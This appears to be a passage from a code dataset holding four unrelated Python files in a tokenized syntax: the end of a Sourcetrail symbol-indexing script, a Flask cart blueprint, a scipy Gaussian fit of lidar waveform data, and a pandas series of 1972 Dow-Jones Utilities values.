}')<line_sep>srctrl.recordSymbolDefinitionKind(methodId srctrl.DEFINITION_EXPLICIT)<line_sep>srctrl.recordSymbolKind(methodId srctrl.SYMBOL_METHOD)<line_sep>srctrl.recordSymbolLocation(methodId fileId 6 6 6 14)<line_sep>srctrl.recordSymbolScopeLocation(methodId fileId 6 1 7 1)<line_sep>useageId=srctrl.recordReference(methodId memberId srctrl.REFERENCE_USAGE)<line_sep>srctrl.recordReferenceLocation(useageId fileId 7 10 7 18)<line_sep>srctrl.commitTransaction()<if_stmt>len(srctrl.getLastError())<g>0<block_start>print("ERROR: "+srctrl.getLastError())<line_sep><return>1<block_end><if_stmt><not>srctrl.close()<block_start>print("ERROR: "+srctrl.getLastError())<line_sep><return>1<block_end>print("done")<line_sep><return>0<block_end>main()<line_sep> |
<import_from_stmt>flask Blueprint<line_sep># 每一个模块蓝图可以拥有自己的静态文件夹,默认的app会设置好系统级别的static
# 但是蓝图需要自己手动设置注册静态文件的路径
# 为了区分加载的是主应用下的static还是模块下的static,给模块初始化的时候添加url前缀
# 添加前缀后,那么该蓝图.route的时候就自动添加了该前缀, 加载img的时候使用/cart/static/xxx.img
# 如果模块模板和主营业模板下都拥有相同的html名字,则优先加载主营业下的模板
cart_blue=Blueprint('cart' __name__ static_folder='static' template_folder='templates' url_prefix='/cart')<line_sep># 只能在蓝图初始化之后再倒入views,因为.views使用了蓝图
<import_from_stmt>.views *<line_sep> |
"""
The lidar system, data and fit (1 of 2 datasets)
================================================
Generate a chart of the data fitted by Gaussian curve
"""<import_stmt>numpy<as>np<import_stmt>matplotlib.pyplot<as>plt<import_from_stmt>scipy.optimize leastsq<def_stmt>model t coeffs<block_start><return>coeffs[0]+coeffs[1]<times>np.exp(-((t-coeffs[2])/coeffs[3])<power>2)<block_end><def_stmt>residuals coeffs y t<block_start><return>y-model(t coeffs)<block_end>waveform_1=np.load('waveform_1.npy')<line_sep>t=np.arange(len(waveform_1))<line_sep>x0=np.array([3 30 15 1] dtype=float)<line_sep>x,flag=leastsq(residuals x0 args=(waveform_1 t))<line_sep>print(x)<line_sep>fig,ax=plt.subplots(figsize=(8 6))<line_sep>plt.plot(t waveform_1 t model(t x))<line_sep>plt.xlabel('Time [ns]')<line_sep>plt.ylabel('Amplitude [bins]')<line_sep>plt.legend(['Waveform' 'Model'])<line_sep>plt.show()<line_sep> |
"""
Dow-Jones Utilities Index, Aug.28--Dec.18, 1972.
Dataset described in [1]_ and included as a part of the ITSM2000 software [2]_.
Downloaded on April 22, 2019 from:
http://www.springer.com/cda/content/document/cda_downloaddocument/ITSM2000.zip
See also https://finance.yahoo.com/quote/%5EDJU/history?period1=83822400&period2=93502800&interval=1d&filter=history&frequency=1d
TODO: Add the correct business days index for this data (freq='B' does not work)
References
----------
.. [1] Brockwell, <NAME>., and <NAME>. 2016.
Introduction to Time Series and Forecasting. Springer.
.. [2] Brockwell, <NAME>., and <NAME>. n.d. ITSM2000.
"""<line_sep># noqa:E501
<import_stmt>pandas<as>pd<line_sep>dowj=pd.Series([110.94 110.69 110.43 110.56 110.75 110.84 110.46 110.56 110.46 110.05 109.6 109.31 109.31 109.25 109.02 108.54 108.77 109.02 109.44 109.38 109.53 109.89 110.56 110.56 110.72 111.23 111.48 111.58 111.9 112.19 112.06 111.96 111.68 111.36 111.42 112 112.22 112.7 113.15 114.36 114.65 115.06 115.86 116.4 116.44 116.88 118.07 118.51 119.28 119.79 119.7 119.28 119.66 120.14 120.97 121.13 121.55 121.96 122.26 123.79 124.11 124.14 123.37 123.02 122.86 123.02 123.11 123.05 123.05 122.83 123.18 122.67 122.73 122.86 122.67 122.09 122 121.23])<line_sep> |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.